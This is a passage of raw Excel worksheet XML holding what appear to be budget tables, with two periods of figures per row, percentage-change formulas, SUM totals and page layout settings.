        <f t="shared" ref="D6:D41" si="0">IFERROR((C6-B6)/B6*100,"-")</f>
        <v>4.97960025671587</v>
      </c>
    </row>
    <row r="7" ht="17" customHeight="1" spans="1:4">
      <c r="A7" s="778" t="s">
        <v>642</v>
      </c>
      <c r="B7" s="775">
        <v>31985</v>
      </c>
      <c r="C7" s="776">
        <v>34082</v>
      </c>
      <c r="D7" s="777">
        <f t="shared" si="0"/>
        <v>6.55619821791465</v>
      </c>
    </row>
    <row r="8" ht="17" customHeight="1" spans="1:4">
      <c r="A8" s="774" t="s">
        <v>643</v>
      </c>
      <c r="B8" s="775">
        <v>18011</v>
      </c>
      <c r="C8" s="776">
        <v>20626</v>
      </c>
      <c r="D8" s="777">
        <f t="shared" si="0"/>
        <v>14.5189051135417</v>
      </c>
    </row>
    <row r="9" ht="17" customHeight="1" spans="1:4">
      <c r="A9" s="774" t="s">
        <v>644</v>
      </c>
      <c r="B9" s="775">
        <v>9267</v>
      </c>
      <c r="C9" s="776">
        <v>4072</v>
      </c>
      <c r="D9" s="777">
        <f t="shared" si="0"/>
        <v>-56.0591345635049</v>
      </c>
    </row>
    <row r="10" ht="17" customHeight="1" spans="1:4">
      <c r="A10" s="774" t="s">
        <v>645</v>
      </c>
      <c r="B10" s="775">
        <v>1384</v>
      </c>
      <c r="C10" s="776">
        <v>1797</v>
      </c>
      <c r="D10" s="777">
        <f t="shared" si="0"/>
        <v>29.8410404624277</v>
      </c>
    </row>
    <row r="11" ht="17" customHeight="1" spans="1:4">
      <c r="A11" s="774" t="s">
        <v>646</v>
      </c>
      <c r="B11" s="775">
        <v>3422</v>
      </c>
      <c r="C11" s="776">
        <v>3439</v>
      </c>
      <c r="D11" s="777">
        <f t="shared" si="0"/>
        <v>0.496785505552309</v>
      </c>
    </row>
    <row r="12" ht="17" customHeight="1" spans="1:4">
      <c r="A12" s="774" t="s">
        <v>647</v>
      </c>
      <c r="B12" s="775">
        <v>8038</v>
      </c>
      <c r="C12" s="776">
        <v>9883</v>
      </c>
      <c r="D12" s="777">
        <f t="shared" si="0"/>
        <v>22.9534710126897</v>
      </c>
    </row>
    <row r="13" ht="17" customHeight="1" spans="1:4">
      <c r="A13" s="774" t="s">
        <v>648</v>
      </c>
      <c r="B13" s="775">
        <v>1918</v>
      </c>
      <c r="C13" s="776">
        <v>1428</v>
      </c>
      <c r="D13" s="777">
        <f t="shared" si="0"/>
        <v>-25.5474452554745</v>
      </c>
    </row>
    <row r="14" ht="17" customHeight="1" spans="1:4">
      <c r="A14" s="774" t="s">
        <v>649</v>
      </c>
      <c r="B14" s="775">
        <v>2952</v>
      </c>
      <c r="C14" s="776">
        <v>4170</v>
      </c>
      <c r="D14" s="777">
        <f t="shared" si="0"/>
        <v>41.260162601626</v>
      </c>
    </row>
    <row r="15" ht="17" customHeight="1" spans="1:4">
      <c r="A15" s="774" t="s">
        <v>650</v>
      </c>
      <c r="B15" s="775">
        <v>1054</v>
      </c>
      <c r="C15" s="776">
        <v>-1956</v>
      </c>
      <c r="D15" s="777">
        <f t="shared" si="0"/>
        <v>-285.578747628084</v>
      </c>
    </row>
    <row r="16" ht="17" customHeight="1" spans="1:4">
      <c r="A16" s="774" t="s">
        <v>651</v>
      </c>
      <c r="B16" s="775">
        <v>1910</v>
      </c>
      <c r="C16" s="776">
        <v>2267</v>
      </c>
      <c r="D16" s="777">
        <f t="shared" si="0"/>
        <v>18.6910994764398</v>
      </c>
    </row>
    <row r="17" ht="17" customHeight="1" spans="1:4">
      <c r="A17" s="774" t="s">
        <v>652</v>
      </c>
      <c r="B17" s="775">
        <v>952</v>
      </c>
      <c r="C17" s="776">
        <v>2991</v>
      </c>
      <c r="D17" s="777">
        <f t="shared" si="0"/>
        <v>214.180672268908</v>
      </c>
    </row>
    <row r="18" ht="17" customHeight="1" spans="1:4">
      <c r="A18" s="774" t="s">
        <v>653</v>
      </c>
      <c r="B18" s="775">
        <v>6028</v>
      </c>
      <c r="C18" s="776">
        <v>8509</v>
      </c>
      <c r="D18" s="777">
        <f t="shared" si="0"/>
        <v>41.1579296615793</v>
      </c>
    </row>
    <row r="19" ht="17" customHeight="1" spans="1:4">
      <c r="A19" s="774" t="s">
        <v>654</v>
      </c>
      <c r="B19" s="775">
        <v>6</v>
      </c>
      <c r="C19" s="776">
        <v>4</v>
      </c>
      <c r="D19" s="777">
        <f t="shared" si="0"/>
        <v>-33.3333333333333</v>
      </c>
    </row>
    <row r="20" ht="17" customHeight="1" spans="1:4">
      <c r="A20" s="774" t="s">
        <v>655</v>
      </c>
      <c r="B20" s="775">
        <v>328</v>
      </c>
      <c r="C20" s="776">
        <v>289</v>
      </c>
      <c r="D20" s="777">
        <f t="shared" si="0"/>
        <v>-11.890243902439</v>
      </c>
    </row>
    <row r="21" ht="17" customHeight="1" spans="1:4">
      <c r="A21" s="774" t="s">
        <v>656</v>
      </c>
      <c r="B21" s="775">
        <v>1</v>
      </c>
      <c r="C21" s="776"/>
      <c r="D21" s="777">
        <f t="shared" si="0"/>
        <v>-100</v>
      </c>
    </row>
    <row r="22" ht="17" customHeight="1" spans="1:4">
      <c r="A22" s="774" t="s">
        <v>397</v>
      </c>
      <c r="B22" s="775">
        <f>SUM(B23:B29)</f>
        <v>118400</v>
      </c>
      <c r="C22" s="1022">
        <f>SUM(C23:C29)</f>
        <v>124761</v>
      </c>
      <c r="D22" s="777">
        <f t="shared" si="0"/>
        <v>5.37246621621622</v>
      </c>
    </row>
    <row r="23" ht="17" customHeight="1" spans="1:4">
      <c r="A23" s="774" t="s">
        <v>657</v>
      </c>
      <c r="B23" s="775">
        <v>5952</v>
      </c>
      <c r="C23" s="776">
        <v>6254</v>
      </c>
      <c r="D23" s="777">
        <f t="shared" si="0"/>
        <v>5.0739247311828</v>
      </c>
    </row>
    <row r="24" ht="17" customHeight="1" spans="1:4">
      <c r="A24" s="774" t="s">
        <v>658</v>
      </c>
      <c r="B24" s="775">
        <v>5183</v>
      </c>
      <c r="C24" s="776">
        <v>6400</v>
      </c>
      <c r="D24" s="777">
        <f t="shared" si="0"/>
        <v>23.4806096855103</v>
      </c>
    </row>
    <row r="25" ht="17" customHeight="1" spans="1:4">
      <c r="A25" s="774" t="s">
        <v>659</v>
      </c>
      <c r="B25" s="775">
        <v>15357</v>
      </c>
      <c r="C25" s="776">
        <v>12690</v>
      </c>
      <c r="D25" s="777">
        <f t="shared" si="0"/>
        <v>-17.3666731783551</v>
      </c>
    </row>
    <row r="26" ht="17" customHeight="1" spans="1:4">
      <c r="A26" s="774" t="s">
        <v>660</v>
      </c>
      <c r="B26" s="775"/>
      <c r="C26" s="776"/>
      <c r="D26" s="777"/>
    </row>
    <row r="27" ht="17" customHeight="1" spans="1:4">
      <c r="A27" s="774" t="s">
        <v>661</v>
      </c>
      <c r="B27" s="775">
        <v>91389</v>
      </c>
      <c r="C27" s="776">
        <v>98884</v>
      </c>
      <c r="D27" s="777">
        <f>IFERROR((C27-B27)/B27*100,"-")</f>
        <v>8.2012058344002</v>
      </c>
    </row>
    <row r="28" ht="17" customHeight="1" spans="1:4">
      <c r="A28" s="774" t="s">
        <v>662</v>
      </c>
      <c r="B28" s="775"/>
      <c r="C28" s="776">
        <v>109</v>
      </c>
      <c r="D28" s="777"/>
    </row>
    <row r="29" ht="17" customHeight="1" spans="1:4">
      <c r="A29" s="774" t="s">
        <v>663</v>
      </c>
      <c r="B29" s="775">
        <v>519</v>
      </c>
      <c r="C29" s="776">
        <v>424</v>
      </c>
      <c r="D29" s="777">
        <f>IFERROR((C29-B29)/B29*100,"-")</f>
        <v>-18.3044315992293</v>
      </c>
    </row>
    <row r="30" ht="17" customHeight="1" spans="1:4">
      <c r="A30" s="1083" t="s">
        <v>405</v>
      </c>
      <c r="B30" s="1084">
        <f>SUM(B6,B22)</f>
        <v>205656</v>
      </c>
      <c r="C30" s="1085">
        <f>SUM(C6,C22)</f>
        <v>216362</v>
      </c>
      <c r="D30" s="1086">
        <f t="shared" si="0"/>
        <v>5.20578052670479</v>
      </c>
    </row>
    <row r="31" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A31" s="774" t="s">
        <v>406</v>
      </c>
      <c r="B31" s="775">
        <f>B32+B33</f>
        <v>21080</v>
      </c>
      <c r="C31" s="776">
        <f>SUM(C32:C33)</f>
        <v>7140</v>
      </c>
      <c r="D31" s="777">
        <f t="shared" si="0"/>
        <v>-66.1290322580645</v>
      </c>
      <c r="XEY31"/>
      <c r="XEZ31"/>
      <c r="XFA31"/>
      <c r="XFB31"/>
      <c r="XFC31"/>
      <c r="XFD31"/>
    </row>
    <row r="32" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A32" s="774" t="s">
        <v>664</v>
      </c>
      <c r="B32" s="775"/>
      <c r="C32" s="776"/>
      <c r="D32" s="777"/>
      <c r="XEY32"/>
      <c r="XEZ32"/>
      <c r="XFA32"/>
      <c r="XFB32"/>
      <c r="XFC32"/>
      <c r="XFD32"/>
    </row>
    <row r="33" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A33" s="778" t="s">
        <v>665</v>
      </c>
      <c r="B33" s="775">
        <v>21080</v>
      </c>
      <c r="C33" s="776">
        <v>7140</v>
      </c>
      <c r="D33" s="777">
        <f t="shared" ref="D32:D43" si="1">IFERROR((C33-B33)/B33*100,"-")</f>
        <v>-66.1290322580645</v>
      </c>
      <c r="XEY33"/>
      <c r="XEZ33"/>
      <c r="XFA33"/>
      <c r="XFB33"/>
      <c r="XFC33"/>
      <c r="XFD33"/>
    </row>
    <row r="34" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A34" s="774" t="s">
        <v>409</v>
      </c>
      <c r="B34" s="775">
        <f>B35+B36+B37+B38+B39+B40+B41+B42</f>
        <v>340846</v>
      </c>
      <c r="C34" s="779">
        <f>SUM(C35:C42)</f>
        <v>318243</v>
      </c>
      <c r="D34" s="777">
        <f t="shared" si="1"/>
        <v>-6.63144059193888</v>
      </c>
      <c r="XEY34"/>
      <c r="XEZ34"/>
      <c r="XFA34"/>
      <c r="XFB34"/>
      <c r="XFC34"/>
      <c r="XFD34"/>
    </row>
    <row r="35" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A35" s="774" t="s">
        <v>666</v>
      </c>
      <c r="B35" s="775">
        <v>12077</v>
      </c>
      <c r="C35" s="776">
        <v>12077</v>
      </c>
      <c r="D35" s="777">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="XEY35"/>
      <c r="XEZ35"/>
      <c r="XFA35"/>
      <c r="XFB35"/>
      <c r="XFC35"/>
      <c r="XFD35"/>
    </row>
    <row r="36" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A36" s="774" t="s">
        <v>667</v>
      </c>
      <c r="B36" s="775">
        <v>166691</v>
      </c>
      <c r="C36" s="776">
        <v>181087</v>
      </c>
      <c r="D36" s="777">
        <f t="shared" si="1"/>
        <v>8.6363390944922</v>
      </c>
      <c r="XEY36"/>
      <c r="XEZ36"/>
      <c r="XFA36"/>
      <c r="XFB36"/>
      <c r="XFC36"/>
      <c r="XFD36"/>
    </row>
    <row r="37" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A37" s="774" t="s">
        <v>668</v>
      </c>
      <c r="B37" s="775">
        <v>23722</v>
      </c>
      <c r="C37" s="776">
        <v>35115</v>
      </c>
      <c r="D37" s="777">
        <f t="shared" si="1"/>
        <v>48.0271477952955</v>
      </c>
      <c r="XEY37"/>
      <c r="XEZ37"/>
      <c r="XFA37"/>
      <c r="XFB37"/>
      <c r="XFC37"/>
      <c r="XFD37"/>
    </row>
    <row r="38" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A38" s="778" t="s">
        <v>669</v>
      </c>
      <c r="B38" s="775">
        <v>30637</v>
      </c>
      <c r="C38" s="776">
        <v>25874</v>
      </c>
      <c r="D38" s="777">
        <f t="shared" si="1"/>
        <v>-15.5465613473904</v>
      </c>
      <c r="XEY38"/>
      <c r="XEZ38"/>
      <c r="XFA38"/>
      <c r="XFB38"/>
      <c r="XFC38"/>
      <c r="XFD38"/>
    </row>
    <row r="39" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A39" s="774" t="s">
        <v>670</v>
      </c>
      <c r="B39" s="775">
        <v>424</v>
      </c>
      <c r="C39" s="776">
        <v>5489</v>
      </c>
      <c r="D39" s="777">
        <f t="shared" si="1"/>
        <v>1194.57547169811</v>
      </c>
      <c r="XEY39"/>
      <c r="XEZ39"/>
      <c r="XFA39"/>
      <c r="XFB39"/>
      <c r="XFC39"/>
      <c r="XFD39"/>
    </row>
    <row r="40" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A40" s="774" t="s">
        <v>671</v>
      </c>
      <c r="B40" s="775">
        <v>90907</v>
      </c>
      <c r="C40" s="776">
        <v>50567</v>
      </c>
      <c r="D40" s="777">
        <f t="shared" si="1"/>
        <v>-44.3750206254744</v>
      </c>
      <c r="XEY40"/>
      <c r="XEZ40"/>
      <c r="XFA40"/>
      <c r="XFB40"/>
      <c r="XFC40"/>
      <c r="XFD40"/>
    </row>
    <row r="41" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A41" s="774" t="s">
        <v>672</v>
      </c>
      <c r="B41" s="775">
        <v>16388</v>
      </c>
      <c r="C41" s="776">
        <v>8034</v>
      </c>
      <c r="D41" s="777">
        <f t="shared" si="1"/>
        <v>-50.9763241396143</v>
      </c>
      <c r="XEY41"/>
      <c r="XEZ41"/>
      <c r="XFA41"/>
      <c r="XFB41"/>
      <c r="XFC41"/>
      <c r="XFD41"/>
    </row>
    <row r="42" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A42" s="774" t="s">
        <v>673</v>
      </c>
      <c r="B42" s="775"/>
      <c r="C42" s="776"/>
      <c r="D42" s="777"/>
      <c r="XEY42"/>
      <c r="XEZ42"/>
      <c r="XFA42"/>
      <c r="XFB42"/>
      <c r="XFC42"/>
      <c r="XFD42"/>
    </row>
    <row r="43" s="968" customFormat="1" ht="17" customHeight="1" spans="1:16384">
      <c r="A43" s="780" t="s">
        <v>417</v>
      </c>
      <c r="B43" s="781">
        <f>B30+B31+B34</f>
        <v>567582</v>
      </c>
      <c r="C43" s="1087">
        <f>C30+C31+C34</f>
        <v>541745</v>
      </c>
      <c r="D43" s="782">
        <f t="shared" si="1"/>
        <v>-4.55211757948631</v>
      </c>
      <c r="XEY43"/>
      <c r="XEZ43"/>
      <c r="XFA43"/>
      <c r="XFB43"/>
      <c r="XFC43"/>
      <c r="XFD43"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.314583333333333" right="0.393055555555556" top="0.472222222222222" bottom="0.511805555555556" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D41"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B16" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C32" sqref="C32:C33"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="36" style="968" customWidth="1"/>
    <col min="2" max="4" width="17.1481481481481" style="968" customWidth="1"/>
    <col min="5" max="5" width="10.2777777777778" style="968"/>
    <col min="6" max="6" width="10.5555555555556" style="968"/>
    <col min="7" max="16376" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:1">
      <c r="A1" s="858" t="s">
        <v>674</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:4">
      <c r="A2" s="998" t="s">
        <v>675</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
    </row>
    <row r="3" spans="4:4">
      <c r="D3" s="1059" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="694" customFormat="1" ht="24.95" customHeight="1" spans="1:4">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="1060" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="987" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="1060"/>
    </row>
    <row r="5" s="694" customFormat="1" ht="24" spans="1:4">
      <c r="A5" s="1061"/>
      <c r="B5" s="1062"/>
      <c r="C5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="D5" s="972" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="21" customHeight="1" spans="1:4">
      <c r="A6" s="1063" t="s">
        <v>676</v>
      </c>
      <c r="B6" s="1064">
        <v>33645</v>
      </c>
      <c r="C6" s="1022">
        <v>30219</v>
      </c>
      <c r="D6" s="1065">
        <f t="shared" ref="D6:D27" si="0">IFERROR((C6-B6)/B6*100,"-")</f>
        <v>-10.1827909050379</v>
      </c>
    </row>
    <row r="7" ht="21" customHeight="1" spans="1:4">
      <c r="A7" s="1063" t="s">
        <v>677</v>
      </c>
      <c r="B7" s="739"/>
      <c r="C7" s="1022"/>
      <c r="D7" s="1065"/>
    </row>
    <row r="8" ht="21" customHeight="1" spans="1:4">
      <c r="A8" s="1063" t="s">
        <v>678</v>
      </c>
      <c r="B8" s="739">
        <v>363</v>
      </c>
      <c r="C8" s="1022">
        <v>341</v>
      </c>
      <c r="D8" s="1065">
        <f t="shared" si="0"/>
        <v>-6.06060606060606</v>
      </c>
    </row>
    <row r="9" ht="21" customHeight="1" spans="1:4">
      <c r="A9" s="1063" t="s">
        <v>679</v>
      </c>
      <c r="B9" s="739">
        <v>23530</v>
      </c>
      <c r="C9" s="1022">
        <v>17469</v>
      </c>
      <c r="D9" s="1065">
        <f t="shared" si="0"/>
        <v>-25.7586060348491</v>
      </c>
    </row>
    <row r="10" ht="21" customHeight="1" spans="1:4">
      <c r="A10" s="1063" t="s">
        <v>680</v>
      </c>
      <c r="B10" s="739">
        <v>117200</v>
      </c>
      <c r="C10" s="1022">
        <v>117300</v>
      </c>
      <c r="D10" s="1065">
        <f t="shared" si="0"/>
        <v>0.0853242320819113</v>
      </c>
    </row>
    <row r="11" ht="21" customHeight="1" spans="1:4">
      <c r="A11" s="1063" t="s">
        <v>681</v>
      </c>
      <c r="B11" s="739">
        <v>956</v>
      </c>
      <c r="C11" s="1022">
        <v>884</v>
      </c>
      <c r="D11" s="1065">
        <f t="shared" si="0"/>
        <v>-7.53138075313808</v>
      </c>
    </row>
    <row r="12" ht="21" customHeight="1" spans="1:4">
      <c r="A12" s="1063" t="s">
        <v>682</v>
      </c>
      <c r="B12" s="739">
        <v>3310</v>
      </c>
      <c r="C12" s="1022">
        <v>3149</v>
      </c>
      <c r="D12" s="1065">
        <f t="shared" si="0"/>
        <v>-4.86404833836858</v>
      </c>
    </row>
    <row r="13" ht="21" customHeight="1" spans="1:4">
      <c r="A13" s="1063" t="s">
        <v>683</v>
      </c>
      <c r="B13" s="739">
        <v>100392</v>
      </c>
      <c r="C13" s="779">
        <v>106800</v>
      </c>
      <c r="D13" s="1065">
        <f t="shared" si="0"/>
        <v>6.38297872340426</v>
      </c>
    </row>
    <row r="14" ht="21" customHeight="1" spans="1:4">
      <c r="A14" s="1063" t="s">
        <v>684</v>
      </c>
      <c r="B14" s="739">
        <v>35351</v>
      </c>
      <c r="C14" s="779">
        <v>41776</v>
      </c>
      <c r="D14" s="1065">
        <f t="shared" si="0"/>
        <v>18.1748748267376</v>
      </c>
    </row>
    <row r="15" ht="21" customHeight="1" spans="1:4">
      <c r="A15" s="1063" t="s">
        <v>685</v>
      </c>
      <c r="B15" s="739">
        <v>3228</v>
      </c>
      <c r="C15" s="1022">
        <v>3373</v>
      </c>
      <c r="D15" s="1065">
        <f t="shared" si="0"/>
        <v>4.49194547707559</v>
      </c>
    </row>
    <row r="16" ht="21" customHeight="1" spans="1:4">
      <c r="A16" s="1063" t="s">
        <v>686</v>
      </c>
      <c r="B16" s="739">
        <v>9938</v>
      </c>
      <c r="C16" s="1022">
        <v>39983</v>
      </c>
      <c r="D16" s="1065">
        <f t="shared" si="0"/>
        <v>302.324411350372</v>
      </c>
    </row>
    <row r="17" ht="21" customHeight="1" spans="1:4">
      <c r="A17" s="1063" t="s">
        <v>687</v>
      </c>
      <c r="B17" s="739">
        <v>38162</v>
      </c>
      <c r="C17" s="779">
        <v>30158</v>
      </c>
      <c r="D17" s="1065">
        <f t="shared" si="0"/>
        <v>-20.9737435144909</v>
      </c>
    </row>
    <row r="18" ht="21" customHeight="1" spans="1:4">
      <c r="A18" s="1063" t="s">
        <v>688</v>
      </c>
      <c r="B18" s="739">
        <v>6845</v>
      </c>
      <c r="C18" s="1022">
        <v>5664</v>
      </c>
      <c r="D18" s="1065">
        <f t="shared" si="0"/>
        <v>-17.2534696859021</v>
      </c>
    </row>
    <row r="19" ht="21" customHeight="1" spans="1:4">
      <c r="A19" s="1063" t="s">
        <v>689</v>
      </c>
      <c r="B19" s="739">
        <v>17857</v>
      </c>
      <c r="C19" s="1022">
        <v>2230</v>
      </c>
      <c r="D19" s="1065">
        <f t="shared" si="0"/>
        <v>-87.5119000952008</v>
      </c>
    </row>
    <row r="20" ht="21" customHeight="1" spans="1:4">
      <c r="A20" s="1063" t="s">
        <v>690</v>
      </c>
      <c r="B20" s="739">
        <v>452</v>
      </c>
      <c r="C20" s="1022">
        <v>1163</v>
      </c>
      <c r="D20" s="1065">
        <f t="shared" si="0"/>
        <v>157.300884955752</v>
      </c>
    </row>
    <row r="21" ht="21" customHeight="1" spans="1:4">
      <c r="A21" s="1063" t="s">
        <v>691</v>
      </c>
      <c r="B21" s="739">
        <v>570</v>
      </c>
      <c r="C21" s="1022">
        <v>165</v>
      </c>
      <c r="D21" s="1065">
        <f t="shared" si="0"/>
        <v>-71.0526315789474</v>
      </c>
    </row>
    <row r="22" ht="21" customHeight="1" spans="1:4">
      <c r="A22" s="1063" t="s">
        <v>692</v>
      </c>
      <c r="B22" s="739">
        <v>932</v>
      </c>
      <c r="C22" s="1022">
        <v>932</v>
      </c>
      <c r="D22" s="1065">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="21" customHeight="1" spans="1:4">
      <c r="A23" s="1063" t="s">
        <v>693</v>
      </c>
      <c r="B23" s="739">
        <v>4026</v>
      </c>
      <c r="C23" s="1022">
        <v>4659</v>
      </c>
      <c r="D23" s="1065">
        <f t="shared" si="0"/>
        <v>15.7228017883756</v>
      </c>
    </row>
    <row r="24" ht="21" customHeight="1" spans="1:4">
      <c r="A24" s="1063" t="s">
        <v>694</v>
      </c>
      <c r="B24" s="739">
        <v>14091</v>
      </c>
      <c r="C24" s="779">
        <v>9999</v>
      </c>
      <c r="D24" s="1065">
        <f t="shared" si="0"/>
        <v>-29.03981264637</v>
      </c>
    </row>
    <row r="25" ht="21" customHeight="1" spans="1:4">
      <c r="A25" s="1063" t="s">
        <v>695</v>
      </c>
      <c r="B25" s="739">
        <v>301</v>
      </c>
      <c r="C25" s="1022">
        <v>182</v>
      </c>
      <c r="D25" s="1065">
        <f t="shared" si="0"/>
        <v>-39.5348837209302</v>
      </c>
    </row>
    <row r="26" ht="21" customHeight="1" spans="1:4">
      <c r="A26" s="1063" t="s">
        <v>696</v>
      </c>
      <c r="B26" s="739">
        <v>3457</v>
      </c>
      <c r="C26" s="1022">
        <v>3529</v>
      </c>
      <c r="D26" s="1065">
        <f t="shared" si="0"/>
        <v>2.08273069135088</v>
      </c>
    </row>
    <row r="27" ht="21" customHeight="1" spans="1:4">
      <c r="A27" s="1066" t="s">
        <v>697</v>
      </c>
      <c r="B27" s="739">
        <v>4806</v>
      </c>
      <c r="C27" s="1022">
        <v>4467</v>
      </c>
      <c r="D27" s="1065">
        <f t="shared" si="0"/>
        <v>-7.05368289637953</v>
      </c>
    </row>
    <row r="28" ht="21" customHeight="1" spans="1:4">
      <c r="A28" s="1066" t="s">
        <v>698</v>
      </c>
      <c r="B28" s="739"/>
      <c r="C28" s="1022"/>
      <c r="D28" s="1065"/>
    </row>
    <row r="29" ht="21" customHeight="1" spans="1:4">
      <c r="A29" s="1066" t="s">
        <v>699</v>
      </c>
      <c r="B29" s="739">
        <v>20533</v>
      </c>
      <c r="C29" s="1022">
        <v>6302</v>
      </c>
      <c r="D29" s="1065">
        <f t="shared" ref="D28:D41" si="1">IFERROR((C29-B29)/B29*100,"-")</f>
        <v>-69.307943310768</v>
      </c>
    </row>
    <row r="30" ht="21" customHeight="1" spans="1:4">
      <c r="A30" s="1067" t="s">
        <v>444</v>
      </c>
      <c r="B30" s="1068">
        <f>SUM(B6:B29)</f>
        <v>439945</v>
      </c>
      <c r="C30" s="1069">
        <f>SUM(C6:C29)</f>
        <v>430744</v>
      </c>
      <c r="D30" s="1070">
        <f t="shared" si="1"/>
        <v>-2.09139778835991</v>
      </c>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:4">
      <c r="A31" s="774" t="s">
        <v>445</v>
      </c>
      <c r="B31" s="739">
        <f>B32+B33</f>
        <v>23560</v>
      </c>
      <c r="C31" s="1071">
        <f>SUM(C32:C33)</f>
        <v>7729</v>
      </c>
      <c r="D31" s="1065">
        <f t="shared" si="1"/>
        <v>-67.1943972835314</v>
      </c>
    </row>
    <row r="32" ht="18" customHeight="1" spans="1:4">
      <c r="A32" s="1072" t="s">
        <v>446</v>
      </c>
      <c r="B32" s="1073">
        <v>2480</v>
      </c>
      <c r="C32" s="1074">
        <v>589</v>
      </c>
      <c r="D32" s="1065">
        <f t="shared" si="1"/>
        <v>-76.25</v>
      </c>
    </row>
    <row r="33" ht="18" customHeight="1" spans="1:4">
      <c r="A33" s="1072" t="s">
        <v>447</v>
      </c>
      <c r="B33" s="1073">
        <v>21080</v>
      </c>
      <c r="C33" s="1074">
        <v>7140</v>
      </c>
      <c r="D33" s="1065">
        <f t="shared" si="1"/>
        <v>-66.1290322580645</v>
      </c>
    </row>
    <row r="34" ht="18" customHeight="1" spans="1:4">
      <c r="A34" s="1063" t="s">
        <v>448</v>
      </c>
      <c r="B34" s="739">
        <f>B35+B36+B37+B38+B39+B40</f>
        <v>104077</v>
      </c>
      <c r="C34" s="1075">
        <f>SUM(C35:C40)</f>
        <v>103272</v>
      </c>
      <c r="D34" s="1065">
        <f t="shared" si="1"/>
        <v>-0.773465799360089</v>
      </c>
    </row>
    <row r="35" ht="18" customHeight="1" spans="1:4">
      <c r="A35" s="1072" t="s">
        <v>449</v>
      </c>
      <c r="B35" s="739"/>
      <c r="C35" s="1073"/>
      <c r="D35" s="1065"/>
    </row>
    <row r="36" ht="18" customHeight="1" spans="1:4">
      <c r="A36" s="1072" t="s">
        <v>450</v>
      </c>
      <c r="B36" s="739">
        <v>72258</v>
      </c>
      <c r="C36" s="1071">
        <v>77620</v>
      </c>
      <c r="D36" s="1065">
        <f t="shared" si="1"/>
        <v>7.42063162556395</v>
      </c>
    </row>
    <row r="37" ht="18" customHeight="1" spans="1:4">
      <c r="A37" s="1076" t="s">
        <v>700</v>
      </c>
      <c r="B37" s="739">
        <v>18296</v>
      </c>
      <c r="C37" s="1077">
        <v>19660</v>
      </c>
      <c r="D37" s="1065">
        <f t="shared" si="1"/>
        <v>7.45518146042851</v>
      </c>
    </row>
    <row r="38" ht="18" customHeight="1" spans="1:4">
      <c r="A38" s="1072" t="s">
        <v>451</v>
      </c>
      <c r="B38" s="739">
        <v>5489</v>
      </c>
      <c r="C38" s="1071"/>
      <c r="D38" s="1065">
        <f t="shared" si="1"/>
        <v>-100</v>
      </c>
    </row>
    <row r="39" ht="18" customHeight="1" spans="1:4">
      <c r="A39" s="1072" t="s">
        <v>452</v>
      </c>
      <c r="B39" s="739"/>
      <c r="C39" s="1071"/>
      <c r="D39" s="1065"/>
    </row>
    <row r="40" ht="18" customHeight="1" spans="1:4">
      <c r="A40" s="1072" t="s">
        <v>453</v>
      </c>
      <c r="B40" s="739">
        <v>8034</v>
      </c>
      <c r="C40" s="1071">
        <v>5992</v>
      </c>
      <c r="D40" s="1065">
        <f t="shared" si="1"/>
        <v>-25.4169778441623</v>
      </c>
    </row>
    <row r="41" ht="18" customHeight="1" spans="1:4">
      <c r="A41" s="984" t="s">
        <v>454</v>
      </c>
      <c r="B41" s="1078">
        <f>B30+B31+B34</f>
        <v>567582</v>
      </c>
      <c r="C41" s="1079">
        <f>C30+C31+C34</f>
        <v>541745</v>
      </c>
      <c r="D41" s="1080">
        <f t="shared" si="1"/>
        <v>-4.55211757948631</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.708661417322835" right="0.708661417322835" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" scale="92" orientation="portrait"/>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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:V13"/>
  <sheetViews>
    <sheetView workbookViewId="0">
